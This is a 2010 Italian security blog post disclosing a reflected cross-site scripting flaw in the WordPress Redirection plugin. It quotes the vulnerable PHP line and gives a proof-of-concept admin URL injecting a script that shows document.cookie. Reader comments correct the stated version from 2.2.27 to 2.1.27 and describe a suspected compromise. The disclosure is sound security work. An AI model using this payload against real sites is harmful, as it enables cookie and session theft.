ClsHack:Computer Security Blog    

[WordPress] Redirection Plugin

Posted on: 30 July 2010

# Exploit Title: [Wordpress] Redirection Plugin <= 2.2.27 XSS
# Date: 29-07-2010
# Author: clshack
# Software Link: http://wordpress.org/extend/plugins/redirection/
# Version: <=2.2.27
# Tested on: wordpress 3.0.1


Page: redirection/view/admin/log.php
Line:13
<input type="hidden" name="sub" value="<strong><?php echo $_GET['sub'] ?></strong>"/>
Exploit:
wp-admin/tools.php?page=redirection.php&curpage=1&sub=log&sub="><script>alert(document.cookie)</script>
Bisogna filtrare l’input :D

Approfondimenti XSS.

Related posts:

  1. [scanner]Plecost: A WordPress Penetration-Test for Plugins
  2. [security-update]Exploit WordPress 2.8.3
  3. Velocizza WordPress con Db-Cache
  4. [Metasploit]Sun Java Web Start Plugin Remote Code Excution
  5. [GUIDA]ETTERCAP E I SUOI PLUGIN :)

This entry was posted on Friday, July 30th, 2010 at 6:10 pm and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • Mario

    Ti sei confuso con la versione del plugin che è la 2.1.27, perché la 2.2.27 non esiste non è presente neanche sulla pagina dell’autore

  • clshack

    @Mario:

    umm io ho copiato da qui:

    http://wordpress.org/extend/plugins/redirection/changelog/

    Però come dici tu, è la versione:2.1.27

  • http://www.anxurweb.com Lino

    Ciao Clshack,
    penso che qualcuno ha sfruttato questo xss per bucarmi il blog. Se su google italia scrivi videoporama esce come primo risultato il mio sito con un titolo del tipo “Cialis e altro”, nella copia cache che google ha fatto risulta non il mio blog !!!

    Clshack, cosa mi consigli di fare per eliminare questo xss e risolvere questo odioso problema, oltre che ridurre al minimo indispensabile i plugin di WordPress.

    Grazie in anticipo!!!

  • clshack

    @Lino:

    Hai di recente aperto link strani che puntavano alla tua dashboard ? o.O

    Altrimenti, non saprei comunque adesso basta che aggiorni il plugin, che hanno fixato.

    E po usa wp-sentinel, lo installo anche io dopo :D

  • Lino

    il plugin l’ho aggiornato, ma il problema era rimasto.
    Ho re-installato WordPress e ho risolto, …o almeno credo di averlo fatto :)

    Link dalla dashboard, …forse, non ricordo bene.
    Comunque mi sto attrezzando per rimuovere il plugin redirection. Wp-sentinel lo proverò.
    Grazie e ciao